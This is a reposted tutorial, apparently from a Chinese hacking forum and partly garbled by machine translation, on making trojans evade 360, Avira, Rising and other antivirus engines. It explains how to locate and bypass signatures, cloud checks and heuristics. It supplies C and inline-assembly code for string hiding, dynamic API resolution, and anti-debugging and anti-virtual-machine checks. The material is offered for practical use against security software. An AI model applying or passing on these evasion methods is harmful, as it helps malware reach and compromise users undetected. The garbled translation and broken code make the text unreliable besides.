360云+BD常规+qvm+国外引擎小红伞+主动防备_病毒安全_

首先，让我谈谈中国防病毒软件的特点。

1 Kingsoft Internet Security，我个人认为被杀死的代码部分和字符串很常见。我个人很少看到输入表功能。

2瑞星，经过实际战斗经验，瑞星杀毒软件简直是垃圾。如果您通过金山，那么除非您杀死敏感字符串，否则您将通过Rising。

3江民，杀弦纯粹是根本。 。您可以隐藏代码。 。你知道

4是所有人最头痛的360杀毒软件。这就是重点。因为360-5发动机基本上是国产的，所以几乎是相同的。

简介，360云查杀+ BD常规+ qvm +外国引擎小红伞+主动防御。

----------------

详细讨论360的主要引擎例程，您知道...

（[1） 360 Cloud Check and Kill实际上是qvm和Red Umbrella的集成版本。它也是云qvm的实时识别，这是每个人最大的麻烦。

（2）我个人怀疑BD引擎有点聪明。有时人们认为无法定位或定位错误。也就是说，可以使用本地终止代码功能等。我个人对BD没感冒，所以我不深入研究。

（3） qvm，所谓的qvm引擎实际上是高启发性+行为判断+特征。。这无疑是智能引擎。

（[4） Red Umbrella，与qvm并无多大区别。它也属于情报。大部分都在杀人。

（5）实际上不存在主动防御引擎。即，警卫提示进行主动防御。（也就是说，它越过表面，却提示它是徒劳的）

-------

详细讨论360的每个引擎的定位例程和想法。

先决条件，注释掉合并部分+延迟加载+优化部分。删除版权信息和图标（这也排除了可能性）和观看模式R模式。不要使用调试模式，这是调试模式。 （必需）

事实上，360引擎已经结束了。也许有很多方法，我只是说说我的定位例程。

第一步是断开Internet连接，关闭所有引擎，然后打开Cloud Kill，即找到本地的Cloud Kill。真是垃圾。

第二步，继续通过BD，定位方法相同，向前跳过1000个磁头。 （如果不杀死源代码就无法杀死头部，因此跳过1000个头部即可）。根据定位情况解决了定位问题。

第三步是关闭所有防病毒软件并找到qvm。为了便于正确定位，我们必须添加反调试代码（我个人必须这样做）和其他方式，因为qvm很聪明。大家都知道qvm杀死100％是输入表的功能。因此，每个人都必须一张一张地填写位置。 （您知道）在哪里填充它，在哪里不杀死它，因此它位于该dll中。因此，以相反的方向定位该线段。基本上没有问题，然后一一填写并一一找到。这是为您提供的示例，kernel3 2. dll + user3 2. dll填充了两个dll。因此，就在这里，（通常，填充会跳过GetProcAddress和LoadLibrary，因为杀死这两个函数意味着它是错误的，并且会发生定位错误。因此没有必要。）这样，如果仍然无法进行定位，那么这就是行为的杀戮。反调试代码。或者，您可以执行预处理进行测试。例如，转换大小和最快模式，版权和图标的增减将影响整个功能的顺序。如果进行的转换不包括填充所有常见的dll或被杀死，则可以选择放弃。或者找到更有效的反调试方法。

第四，小红伞引擎。这也让每个人都感到头疼。我个人的实际战斗经验基本上为红伞增加了版权。我不知道该怎么做。我也很沮丧，没有去研究它。如果没有版权，它将被杀死。在我看来 。 。然后，定位方法与qvm基本相同，并且也很聪明。通常，总是会定位错误的功能。可以继续定位。如果您失去了智力，则需要耐心等待。

第五，这也是每个人最麻烦的问题，Yunchacha。我个人说Yali很大。我还介绍了云检查和杀死的想法。也就是说，实时识别云，它经过了什么？然后是qvm和red伞的引擎库。估计还有其他行为需要研究。 （据了解，这360个开发人员是一群黑客。你知道这意味着什么）离家更近..云查杀需要进行。但是，我曾考虑过删除云以检查并杀死前几个引擎。终于通过云杀。 Cloud Killing的输入表功能也是如此。我曾经认为Cloud Killing是一秒钟的手动云识别。后来我发现它似乎不是，它是一个云qvm。这非常麻烦和繁琐。说到云杀死了我，这真令人恶心。但是我不得不说这太艰难了，太艰难了。添加qvm和红伞。这只是一件痛苦的事情，使回避者感到非常痛苦。定位方法需要定位在正方向，也要一圈一圈。排除。傅兄弟说，如果可以动态调用10个以上的函数，则下次很难找到此源代码。可以说基本上没有传递它的方法，这意味着无法找到输入表函数。 。即使位于，也有一些无法调用的地方。我相信每个人都有一套自己的方法，所以在这里我不会胡说八道。有很多情况，并且有许多杀死资源的特定方法。每个人都可以去JKC Remnant Shell和其他论坛来找到相关的教程，这很容易解决。例如，如果您传递dll但杀死dat的dll资源，然后填写MZ标头，则添加要在exe源代码中运行的代码以释放dll和MZ。哈哈，你也知道这一点。

-----------

说实话，我暂时只能想到这些。具体取决于您自己，具体取决于实际的战斗经验和更多的耐心。有时候我会因为一个问题而沮丧一个星期。 。所以不要轻易放弃。

----------

以上摘要

360，非常坚固。但是，有许多特定的方法可以克服它们。我不会谈论qvm和红伞，而只是谈论云引擎。例如，可以通过upx压缩，但是现在我不知道它是否被阻止。实际上，玩弄黑棋是要相互借鉴，并学会使用黑棋。无论是杀伤力还是穿透力。对自己有信心。一天不能工作，两天两天不能工作三天。一开始，我几乎是疯了，因为避免了实际战斗。哈哈，我不想总结我的想法，我只是说我必须要有耐心。这就像为老人赚钱。如果你放弃，什么也不要说。一旦您成功杀死了软件，那么满足感就意味着您知道自己所知道的。 。 。和大家聊一会儿。

----------------

很好继续。

我不会向您发送反调试代码。它也可以在Internet上获得，也可以下载更多源代码。许多源代码已经过处理，因此请学习从他人的代码和说明中学习。发送常用的动态调用和字符串隐藏等，

1.字符串连接

//

//连接字符串“ canxin”（字符串串联方法）

char * str1 =“ can”，* str2 =“ xin”，* str3 = NULL;

str3 =新字符[strlen（str 1) + strlen（str 2) +1];

strcpy（str3，str 1); //将str1指向的以NULL结尾的字符串复制到str3指向的数组中

strcat（str3，str 2); //将str2指向的字符串添加到str3的末尾（在dest末尾覆盖'\ 0'）并添加'\ 0'

//这样，实现了str3 = str1 + str2，并将str1和str2连接起来。

//

2.字符串隐藏

char XXX [] = {'c'，'a'，'n'，'x'，'i'，'n'，'\ 0'};

3.动态通话

***************定义*******************

处理

WINAPI

CreateToolhelp32Snapshot（

DWORD dwFlags，

DWORD th32ProcessID

）;

*************** Liezi *******************

typedef HANDLE（WINAPI * CreateToolhelp32SnapshotT）

（

DWORD dwFlags，

DWORD th32ProcessID

）;

CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot =（CreateToolhelp32SnapshotT）GetProcAddress（LoadLibrary（“ KERNEL3 2. dll”），“ CreateToolhelp32Snapshot”）;

4.异常尝试捕获

// Liezi //

UnhookWindowsHookEx（m_pTShared-> hGetMsgHook）;

// Liezi //

-------------------------生成后-------------------- -----

char canxin = 1;

尝试

{

if（canxin = 1) throw 31;

}

抓住（...）

{

UnhookWindowsHookEx（m_pTShared-> hGetMsgHook）;

}

-------------------------生成后-------------------- -----

----------------

让我们讨论一些常见问题，例如BD云本地等。常见的定位错误和常见的解决方案。例如，定位BD是很常见的，一旦生成，检查并杀死，生成20个块，检查并杀死20个块，您可能会误解定位错误的无限循环。实际上，这是不对的，您可以继续定位并第二次继续。知道位置2的大小，直到不杀死它，在OD中找到特征地址的位置，上下检查，是否有调用或字符串形式，然后继续搜索关键位置在源代码中。分析功能，找到源代码，并在上面添加鲜花和其他处理。也有可能无法找到真实特征位置。可以调试。例如，我亲自在main函数的标题下添加了一个常用的代码，并添加了“ HKEY ck;

char strreg [] = {'S'，'O'，'F'，'T'，'W'，'A'，'R'，'E'，'\\'，'O'， 'D'，'B'，'C'，'\ 0'};

如果（ERROR_SUCCESS！= RegOpenKeyEx（HKEY_LOCAL_MACHINE，（LPCTSTR）strreg，0，KEY_ALL_ACCESS，＆ck））

{

返回0；

}”

这可以直接传递，有时取决于处理情况。首先是做好预处理。我个人通常会删除所有优化延迟和部分处理代码。实际上，本地云已与Internet断开连接。云定位的本地特征通常不会杀死。但是强烈建议您一次通过360。不能同时使用Red Umbrella和qvm，并且不能将Cloud Local和BD正确地放置在一起。那行不通。我仍然怀疑BD也具有干扰作用。因此，除了云扫描和杀死事故之外，所有其他更新了最新的库以断开网络连接。全部清除，然后连接到云。

-----------------

接下来，让我谈谈常见的云检查和杀死技术。常见的dll和dat已被杀死，但是生成的木马也已被杀死。这是因为dll和dat的行为或行为，或者是杀死exe资源中的dll，也就是说，资源也是每个人都要排除的关键点。另一方法是在其中添加常规文件资源，这也会起作用。如果它已生成并被杀死，则填写资源头以进行处理，等等。然后在配置信息中，只需输入服务名称，依此类推。不要输入敏感字符，例如36 0.或某些模块之类的东西。所有人都很敏感。

------------

现在，我已经简短地讨论了提示方面。实际上，当前的360基本上将其所有精力都集中在了云和qvm上。保安人员通过的难度也大大降低了。因此，在提示后基本上没有困难，另一个是警卫的本地引擎和云引擎。我认为没有必要多说什么，它只是一秒钟的云识别，没有办法品尝。仅定位卫士。有时qvm云和反软云的特性不相同，并且库可能不同。每个人都应该努力测试和消除它。现在有两个问题，一个是云检查和查杀，另一个是重新启动问题和上载预防。这些都是必要的。我不会谈论这个想法，您可以去论坛讨论或阅读更多教程。

--------------------------

为您提供一些代码，进行反调试

HKEY ck;

char strreg [] = {'S'，'O'，'F'，'T'，'W'，'A'，'R'，'E'，'\\'，'O'， 'D'，'B'，'C'，'\ 0'};

如果（ERROR_SUCCESS！= RegOpenKeyEx（HKEY_LOCAL_MACHINE，（LPCTSTR）strreg，0，KEY_ALL_ACCESS，＆ck））

{

返回0；

}

Bool IsVirtualPC（）// anti-nod32杀死

{

__ try

{

__ asm

{

mov eax，1

_emit 0x0F

_emit 0x3F

_emit 0x07

_emit 0x0B

_emit 0xC7

_emit 0x45

_emit 0xFC

_emit 0xFF

_emit 0xFF

_emit 0xFF

_emit 0xFF

}

}

__ except（1)

{

返回FALSE；

}

返回TRUE；

}

if（IsVirtualPC（））

{

返回0；

}

_asm push esi;

_asm mov esi，46;

_asm inc esi;

_asm mov eax，dword ptr fs：[esi + 1];

_asm mov eax，dword ptr ds：[eax + 24];

_asm mov eax，dword ptr ds：[eax + 12];

_asm cmp eax，2;

_asm pop esi;

_asm je Begin;

_asm lock dec ebx;

开始：

HKEY dd;

char sof1 [] = {'S'，'O'，'F'，'T'，'W'，'A'，'R'，'E'，'\\'，'C'， 'l'，'a'，'s'，'s'，'e'，'s'，'\\'，'。'，'3'，'8'，'6'，'\\'， '\ 0'};

如果（ERROR_SUCCESS！= RegOpenKeyEx（HKEY_LOCAL_MACHINE，sof1,0，KEY_ALL_ACCESS，＆dd））

{

__ asm nop;

__ asm nop;

返回-1;

}

为您提供避免杀死工具的源代码，最好避免在虚拟机或影子系统中进行杀死：

免费的防病毒工具包：

-------------

最后一段

以此类推，不要仅仅使用本教程中的失效方法。如果您听不懂，可以问杜娘或谷歌，也可以问那些大牛。他们有更多的实际战斗。至少他们有想法，并且只能一一测试。测试测试，然后再次测试。 。 。我不怕测试任何方法，恐怕我不耐烦要测试。

本文来自本站，转载请注明本文网址：
http://www.pc-fly.com/a/shouji/article-370266-1.html